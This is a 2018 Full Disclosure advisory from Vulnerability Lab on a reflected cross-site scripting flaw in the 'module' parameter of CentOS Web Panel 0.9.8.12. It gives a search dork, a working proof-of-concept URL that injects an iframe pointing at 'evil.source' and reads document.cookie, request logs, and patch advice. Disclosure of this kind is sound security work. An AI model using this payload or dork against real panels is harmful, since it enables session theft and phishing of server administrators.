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[FD] CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
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- Subject: [FD] CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 19 Jan 2018 22:02:26 +0100
Document Title:
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CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1835
Release Date:
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2018-01-17
Vulnerability Laboratory ID (VL-ID):
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1835
Common Vulnerability Scoring System:
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3.3
Vulnerability Class:
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Cross Site Scripting - Non Persistent
Current Estimated Price:
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500€ - 1.000€
Product & Service Introduction:
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CentOS Web Panel - Free Web Hosting control panel is designed for quick and
easy management of (Dedicated & VPS) servers without of
need to use ssh console for every little thing. There is lot's of options and
features for server management in this control panel.
CWP automatically installs full LAMP on your server (apache,php, phpmyadmin,
webmail, mailserver…).
(Copy of the Homepage: http://centos-webpanel.com/features )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross
site scripting vulnerability in the CentOS Web Panel v0.9.8.12.
Vulnerability Disclosure Timeline:
==================================
2018-01-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
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CWP
Product: CentOS Web Panel - (CWP) 0.9.8.12
Exploitation Technique:
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Remote
Severity Level:
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Medium
Technical Details & Description:
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A client-side cross site scripting web vulnerability has been discovered in the
official CentOS Web Panel v0.9.8.12.
The vulnerability allows remote attackers to inject script code to the
client-side browser to application requests.
The client-side cross site web vulnerability is located in the `module` value
of the `index.php` file GET method request.
The vulnerability can be exploited by remote attackers with a prepared
malicious link to the centos web-panel application.
The request method to inject is GET and the attack vector is non-persistent.
The injection point is the module parameter
and the execution point occurs in the module exception.
The security risk of the web vulnerability is estimated as medium with a cvss
(common vulnerability scoring system) count of 3.3.
Exploitation of the non-persisten vulnerability requires no privileged
web-application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking,
non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of
affected or connected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] index.php
Vulnerable Parameter(s):
[+] module
Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers
without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Dork(s):
"powered by CentOS-WebPanel.com"
PoC: Payload(s)
http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source%20onload=alert%28document.cookie%29%20%3C
http://localhost:2030/index.php?module=clam
PoC: Exception-Handling
<div class="row">
The module clam>"<[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!]> does not
exist.
</div><!-- End .row -->
</div><!-- End contentwrapper -->
</div><!-- End #content -->
</div><!-- End #wrapper -->
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET
http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=evil.source%20onload=alert(document.cookie)%20%3C
Mime Type[text/html]
Request Header:
Host[localhost:2030]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5;
PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
Connection[keep-alive]
Response Header:
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
http://localhost:2030/
http://localhost:2030/index.php
http://localhost:2030/index.php?module
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a sanitize of the vulnerable module
parameters in the `index.php` file GET method request.
Disallow special chars and restrict the parameter input to prevent further
client-side script code injection attacks.
Escape the output content of the error exception for invalid inputs to prevent
the execution point of the client-side vulnerability.
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in
the centos web panel is estimated as medium (CVSS 3.3).
Credits & Authors:
==================
Benjamn Kunz Mejri (Vulnerability Laboratory) -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
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